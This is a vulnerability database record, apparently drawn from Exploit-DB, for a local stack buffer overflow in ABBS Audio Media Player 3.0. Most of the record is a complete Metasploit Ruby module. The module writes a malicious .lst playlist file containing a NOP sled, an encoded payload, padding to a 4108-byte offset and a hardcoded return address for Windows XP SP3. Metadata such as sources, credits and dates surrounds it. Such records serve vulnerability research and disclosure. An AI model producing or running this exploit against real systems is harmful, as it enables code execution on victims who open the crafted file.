ID

VAR-E-201108-0142


EDB ID

17604


TITLE

ABBS Audio Media Player 3.0 - Local Buffer Overflow (Metasploit) - Windows local Exploit

Trust: 0.6

sources: EXPLOIT-DB: 17604

DESCRIPTION

ABBS Audio Media Player 3.0 - Local Buffer Overflow (Metasploit).. local exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 17604

AFFECTED PRODUCTS

vendor:abbsmodel:audio media playerscope:eqversion:3.0

Trust: 1.6

sources: EXPLOIT-DB: 17604 // EDBNET: 40161

EXPLOIT

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})
super(update_info(info,
'Name' => 'ABBS Audio Media Player 3.0 (LST File) Stack Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability
found in ABBS Audio Media Player 3.0.
The overflow occurs when an overly long string is passed
in the lst file.
},
'License' => MSF_LICENSE,
'Author' => [
'h1ch4m', # Initial Discovery
'James Fitts' # Metasploit Module
],
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', 'http://www.exploit-db.com/exploits/16976' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d",
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 EN',
{
'Ret' => 0x0043551f, # call dword ptr ds:[eax] in amp.exe
'Offset' => 4108
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Mar 14 2011',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.lst']),
], self.class)
end

def exploit

lst = make_nops(50)
lst << payload.encoded
lst << make_nops(target['Offset'] - (50 + payload.encoded.length))
lst << [target.ret].pack('V')
lst << rand_text_alpha_upper(4)

print_status("Creating '#{datastore['FILENAME']}' file ...")

file_create(lst)

end

end

Trust: 1.0

sources: EXPLOIT-DB: 17604

EXPLOIT LANGUAGE

rb

Trust: 0.6

sources: EXPLOIT-DB: 17604

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 17604

TYPE

Local Buffer Overflow (Metasploit)

Trust: 1.0

sources: EXPLOIT-DB: 17604

TAGS

tag:Metasploit Framework (MSF)

Trust: 1.0

sources: EXPLOIT-DB: 17604

CREDITS

James Fitts

Trust: 0.6

sources: EXPLOIT-DB: 17604

EXTERNAL IDS

db:EXPLOIT-DBid:17604

Trust: 1.6

db:EDBNETid:40161

Trust: 0.6

sources: EXPLOIT-DB: 17604 // EDBNET: 40161

REFERENCES

url:https://www.exploit-db.com/exploits/17604/

Trust: 0.6

sources: EDBNET: 40161

SOURCES

db:EXPLOIT-DBid:17604
db:EDBNETid:40161

LAST UPDATE DATE

2022-07-27T09:19:19.644000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DBid:17604date:2011-08-04T00:00:00
db:EDBNETid:40161date:2011-08-04T00:00:00